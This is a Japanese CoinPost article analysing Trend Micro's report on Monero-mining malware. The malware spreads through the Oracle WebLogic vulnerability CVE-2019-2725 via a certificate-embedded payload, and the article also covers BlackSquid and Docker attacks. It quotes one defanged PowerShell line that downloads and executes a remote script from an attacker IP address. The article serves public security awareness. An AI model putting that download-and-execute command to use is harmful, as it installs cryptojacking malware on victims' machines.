はじめての仮想通貨
TOP 新着一覧 チャート 学習-運用
CoinPostで今最も読まれています

現在も絶えない仮想通貨モネロ(XMR)「マイニングマルウェア」の脅威|独自考察

画像はShutterstockのライセンス許諾により使用

マイニングマルウェアの脅威が絶えない
トレンドマイクロ社が、仮想通貨モネロをマイニングするマルウェアの脅威について報告書を公開した。当該脆弱性の分析、そして現在も存在している端末に侵入してマイニングを行うマルウェアについて確認する。

トレンドマイクロ社が報告書を公開

サイバーセキュリティを専門とする「トレンドマイクロ社」は6月10日、マイニングマルウェアの脅威について報告書を公開した。

公開された報告書は、【Oracle Weblogic】というソフトウェアの脆弱性(CVE-2019-2725)を利用して仮想通貨モネロをマイニングするマルウェアに関するものだ。当該脆弱性の分析、そして2019年に入ってからも続く、端末に侵入してマイニングを行うマルウェア(ここではマイニングマルウェアと呼称する)について見ていきたい。

トレンドマイクロ社の報告から見えてくるもの

このマルウェアに関する分析は、SANS ISC INFOSECフォーラムが情報源となっている。

そもそもOracle WebLogicは、JAVAが動くアプリケーションサーバーだ。もう少し詳しく説明すると、オラクル社が提供する業務用ミドルウェアや開発者向け製品などのソフトウェア製品群であり、エンジニアを除けば普通は扱うことはないだろう。

しかし、脆弱性の利用方法を見ていくと興味深い点が見つかる。ブラウザはHTTPSで暗号化された通信を行うため、相手が正しいURL(例えば coinpost.jp)であることを証明書を使って確認する。そして、今回はこの証明書に攻撃のペイロード(実際に攻撃を行うためのコード)が含まれていた。

以下の画像は、証明書を実際に見たことがある人向けだが、一見、普通の証明書に見える。

出典 : TREND MICRO

しかしこれをデコードすると、攻撃ペイロードのPowershellスクリプトが含まれていることが分かる。URLはhxxpとなっているが、特定のIPアドレスに通信を行っていることが分かるだろうか。この処理が行われてしまうと、update.ps1というスクリプトが実行され、勝手にモネロをマイニングされてしまうのだ。

iex(New-ObjectNet.WebClient).DownloadString(‘hxxp://139.180.199.167:1012/update[.]ps1’)

証明書を利用してマルウェアを配布するというアイデア自体は目新しいものではない。 昨年時点で概念実証は行われており、Excelをマクロを含めて実行させるなど、実行可能であることが示されていた。

一方で今回の事例を見ると、証明書に隠したスクリプト単体で動作するものではなく、特定IPへの通信は複雑な技術を用いずに通信される仕組みになっている。つまり、この通信をマルウェア対策ソフトウェアなどで検知される可能性があるということだ。この点は、まだまだ攻撃に改良の余地があることを示しており、報告書でもテストの可能性があると述べている。

活発化するマイニングマルウェアによる攻撃

ビットコインなど暗号資産の価格が上昇するに伴い、攻撃者の活動も活発化している様子だ。 6月10日には8つの脆弱性を利用してマイニングマルウェアを送り込むBlackSquidについて、6月11日にはインターネットから接続可能なデバイスを探索した上でDockerコンテナを送り込むという手口に関して、同様にトレンドマイクロ社が日本語で注意喚起している。

前者のBlackSquidは、いずれも比較的古い脆弱性(EternalBlueやDoublePalserと呼ばれるもの等)を対象としており、恐らく既存のマルウェアなどを組み合わせたものと考えられる。

攻撃結果として、やはりモネロのマイニングを行うマイナーXMRigを起動する。 タイと米国で多く検出されたということだが、実装されていない機能も存在することから、将来的にさらなる開発が進められる可能性があるとのことだ。

エラーを含むコードや意図的にスキップされた機能を考慮すると、このマルウェアは開発およびテストの段階にあると考えられる。今後、不正アクセスや情報窃取などのさまざまな攻撃に利用されるかもしれない。あるいは、GPUリソースの有無によってコンポーネントを使い分けながら最も多くの利益を上げられる方法を調査しているのかもしれない。

さらに、彼らは大きな資本投下はせずに特定の標的を定めようとしている可能性もある。そのように考えられる理由は、BlackSquidが利用する脆弱性攻撃コードおよび手口の大多数がアンダーグラウンドで共有されているものであることや、「Shodan」のような有料のサービスを利用して対象を絞り込まずにランダムに生成したIPアドレスに攻撃を仕掛けている点だ。

また、後者のDockerコンテナを用いた手口でも、やはりMoneroを採掘するマイナーが含まれていた。Dockerに代表されるコンテナ技術は、LinuxやWindowsといったOSそれ自体を管理する手間を省力化できるなどの理由で急速に普及している。一方、新しい技術であることから、設定ミスがあると攻撃に晒されてしまう事例と言える。

出典 : TREND MICRO

おわりに

トレンドマイクロ社から報じられた攻撃について、複数の種類のマイニングマルウェアが出回っている点を紹介した。攻撃者がモネロをマイニングするのは利益や匿名性といった点を考慮した結果だと思われるが、将来も同じとは限らない。

また、暗号資産のマイニングに限らず、脆弱な環境は様々な形で悪用されてしまうだろう。ユーザー側の対策としては、OSやソフトウェアはなるべく最新にアップデートしたり、何か新しいものを取り入れるときは公式の情報を確認したり、仕組みを理解して使うことが大切だ。

坪 和樹

Twitter:https://twitter.com/TSB_KZK

Linkedin:https://www.linkedin.com/in/tsubo/

プロフィール:AWSで働くエンジニア、アイルランド在住。MtGoxやThe DAOでは被害を受けたが、ブロックチェーンのセキュリティに興味を持ち続けている。セキュリティカンファレンスでの講演、OWASP Japanの運営協力やMini Hardeningといったイベント立ち上げなど、コミュニティ活動も実績あり。

CoinPostの関連記事

流出した2300万XRP(リップル)の行方、仮想通貨交換所が一部の売却阻止に成功
仮想通貨取引所GateHubから総額23,200,000XRP(約10億円)の仮想通貨XRPが流出した事件で、交換サービスChangeNowはその一部の差し止めに成功したことがわかった。
仮想通貨「ミキシングサービス」の相次ぐ閉鎖、資金引き出しに関するリスクも
大手ミキシングサービスBitBlenderが閉鎖してサービス停止が発表された。同様のサービスの閉鎖が相次いでおり、仮想通貨ビットコインなど預けた資産が取り出せなくなるケースが多発している。
厳選・注目記事
注目・速報 市況・解説 動画解説 新着一覧
05/15 木曜日
08:41
テザー社、AI開発プラットフォーム「QVAC」を発表 ビットコインとUSDT決済も対応
テザー社が分散型AI開発プラットフォーム「QVAC」を発表。ユーザーのデバイス上でAIが動作し、クラウド接続不要。AIエージェントがビットコインやUSDTで自律取引が可能。2025年第3四半期リリース予定。
06:35
イーサリアム財団、セキュリティ向上計画を発表
イーサリアム財団は、仮想通貨イーサリアムのセキュリティを向上させる取り組みを発表。イーサリアムの目標は、インターネットや世界経済を安全に支えることができる文明規模のインフラになることだとした。
05/14 水曜日
17:53
実需主導へと変わるWeb3:Hotcoin、SafePal、NERO Chainが描く未来|香港Web3 Festival2025
Web3 Festivalで注目を集めた3社のリーダーたちが、業界の転換期における生存戦略を語る。SafePalのヴェロニカ氏は実用的サービスの重要性を、HotcoinのスティーブンCOOは差別化戦略を、NERO Chainのポール氏はRWAの可能性を強調した。Web3の次のステージを見据えた貴重な洞察が満載。
15:00
「ビットコイン投資は企業の購買力を守る最高の戦略」フィデリティ提唱
フィデリティ・デジタルアセッツのリサーチ責任者が企業向けカンファレンスで講演し、企業にとってのビットコイン投資の重要性を解説した。
13:50
ソラナ共同創設者、「メタブロックチェーン」を提案 複数チェーン間データを統合
仮想通貨ソラナのヤコベンコ共同創設者が、複数のブロックチェーンデータを統合する「メタブロックチェーン」構想を提案した。低コストなデータ可用性(DA)を実現するものだ。
11:45
Janover、約136ドルでソラナを大量購入 10億円以上の含み益に
ナスダック上場のDeFi Development Corpは、2025年5月12日に172,670SOLのSolanaトークンを平均価格136.81ドルで購入したことを発表した。
11:25
米当局、「ビットコインETF承認」のフェイクニュース発信者に懲役2年の求刑求める
米証券取引委員会のXアカウントを乗っ取りビットコインETFについて偽情報を流した被告に、米検察が懲役2年を求刑した。金融犯罪への厳格な姿勢を示す判断である。
10:45
ビットコインとイーサリアム、異なる強気の動き リサーチ会社が価格動向を分析
K33リサーチとQCPキャピタルの分析によると、ビットコインは100,000ドルを超え、健全な上昇を見せている。米中関税合意を背景に、BTCとETHは安定化を図りながらも新たな動きを見せ始めている模様。
10:20
VanEck、RWAトークン化ファンドを開始 イーサリアムなどに対応
資産運用大手ヴァンエックは、同社初のRWAトークン化ファンド「VBILL」をローンチ。イーサリアム、ソラナ、アバランチ、BNBチェーンのブロックチェーンに対応する。
10:00
LINE BITMAXとは|国内屈指のSNS「LINE」が提供する仮想通貨取引サービス
LINEグループ運営の仮想通貨取引所LINE BITMAXの特徴やサービスの利点について初心向けに解説。LINE BITMAXは独自仮想通貨LINKやビットコインなどを取り扱っています。
07:55
XRPの価格動向 バイナンス先物データに見る強気の兆しとは、アナリスト分析
アナリストBorisVestの分析によると、XRPはバイナンスで売り圧力が吸収され、強気シグナルが点灯。OI(建玉)の上昇と共に、価格上昇の可能性が高まる模様だ。
07:30
楽天ウォレットの特徴を徹底解説|初心者におすすめの仮想通貨取引所、
ビットコインなどを売買できる国内大手仮想通貨取引所「楽天ウォレット」の特徴と、楽天ポイントの活用など初心者投資家向けのおすすめポイントを解説
07:15
ビットコインの「実現価格」が示す強気相場継続のシグナル、Cryptoquantアナリスト分析
Crypto Daの分析によると、仮想通貨ビットコインの「実現価格」が上昇を続けており、強気市場が続くことを示唆。マイクロストラテジーや機関投資家のBTC購入が価格上昇を牽引。
07:05
タイ政府、デジタル投資トークン「G-Token」発行へ
タイのピチャイ財務相は、デジタル投資トークン「G-Token」の発行計画を発表。発行規模は200億円であることや仮想通貨ではないことなどが明らかになっている。
06:10
米SEC、ソラナ・ライトコイン現物ETFの判断を延期
SECがグレースケールのソラナ・ライトコイン現物ETFの判断を延期。ブラックロックのビットコインETFにおける「現物償還方式」導入の是非も引き続き審査へ。

通貨データ

グローバル情報
一覧
プロジェクト
アナウンス
上場/ペア
重要指標
一覧
新着指標
一覧